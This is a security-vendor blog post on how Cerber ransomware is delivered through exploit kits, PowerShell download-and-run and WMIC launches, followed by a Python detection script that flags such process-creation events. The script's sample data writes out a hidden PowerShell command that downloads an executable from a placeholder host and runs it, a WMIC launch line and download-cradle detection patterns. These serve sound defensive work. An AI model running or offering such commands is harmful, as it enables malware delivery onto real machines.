Tales of Ransomwhere: Cerber on the rise
Cerber is a relatively new ransomware family that has been hitting hard over the past few months. In this article, we want to take a look at some of the techniques it uses to infect its victims.
Chapter 2: Cerber
In my first article in this series, I talked about how the Windows utility known as PowerShell is used to infect computers with ransomware. This can be done in various ways, but PowerShell is chosen for a reason: it is really powerful! One of the easiest ways to use it is to download a (malicious!) file and run it. Of course, before this can happen, PowerShell itself must be launched, which can be done from some kind of script, a macro inside an Office document, or as the "payload" of an exploit. In the case of Cerber, exploit kits are typically used.
With all the telemetry we have, this kind of activity is easy to filter for. Over the past 3 months, more than 3,000 infection attempts were blocked in which PowerShell was used to download and run malware (ransomware):
After a quick look, I would say that it is Cerber, although there may be other ransomware families mixed in (since we block all of these infections, we don't need to check every binary unless it is required for research purposes). Most of these attacks occurred in the first weeks of July. If we go back to October of last year, we can see that this is in fact the biggest wave of infections using this technique in the last 10 months:
Here are a few hashes, randomly selected from the many thousands that we block, in case you want to "play" with them in your lab and protect your users:
Another technique that is quite common these days for running the malicious program that infects victims with Cerber is WMIC, the command-line interface to Windows Management Instrumentation (WMI). So far, all the cases that we have observed have occurred through exploits on computers running Internet Explorer. The malware sample is downloaded to the computer and, instead of being executed immediately, it is launched through WMIC (an attempt to make the behavior look legitimate, since WMIC is a benign program that belongs to the Windows operating system). Over the past 4 weeks, we have blocked more than 3,000 infection attempts using this "trick":
Here is another selection of ransomware hashes using this WMIC technique that we blocked over a 3-day period:
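The two delivery patterns described above (a PowerShell download-and-run one-liner, and a downloaded sample launched through WMIC, both spawned from an exploited browser) can be surfaced from process-creation telemetry such as Sysmon Event ID 1 or Windows event 4688. The following is an added detection example written for this article, not code from Panda or the original post; the event records and command lines are constructed samples, and the field names (`parent`, `image`, `cmdline`) are an assumption about how your log pipeline normalises those events.

```python
import re

# Constructed process-creation events (not real telemetry). Fields are assumed
# to be normalised from Sysmon EID 1 / Windows 4688: ParentImage, Image, CommandLine.
EVENTS = [
    {"parent": "iexplore.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -nop -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe');"
                " Start-Process 'C:\\Users\\Public\\x.exe'\""},
    {"parent": "iexplore.exe", "image": "wmic.exe",
     "cmdline": "wmic process call create \"C:\\Users\\Public\\x.exe\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},          # benign admin script
    {"parent": "cmd.exe", "image": "wmic.exe", "cmdline": "wmic os get caption"},  # benign query
]

# Parents that should rarely spawn a scripting host or WMIC directly.
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Common PowerShell "download cradle" primitives used to fetch a payload.
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
# Flags typical of a one-liner that wants to stay out of sight.
STEALTH_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc\b", re.I)
# WMIC used to launch a process instead of running it directly.
WMIC_CREATE = re.compile(r"\bprocess\s+call\s+create\b", re.I)


def classify(event):
    """Return the list of reasons an event looks like the Cerber delivery chain
    described in the article; an empty list means nothing matched."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    reasons = []
    if image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
        reasons.append("powershell download cradle")
        if STEALTH_FLAGS.search(cmd):
            reasons.append("hidden/no-profile flags")
    if image == "wmic.exe" and WMIC_CREATE.search(cmd):
        reasons.append("wmic process call create")
    # Escalate only when a suspicious command came from a browser or Office parent.
    if reasons and parent in BROWSERS | OFFICE:
        reasons.append(f"spawned by {parent}")
    return reasons


def triage(events):
    """Index and reasons for every event that tripped at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Run `triage(EVENTS)` to see that only the two exploit-kit style events are flagged; the scheduled backup script and the plain WMI query pass untouched.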
Stay with us until the next chapter of Ransomwhere Tales.
Article Author: Luis Corrons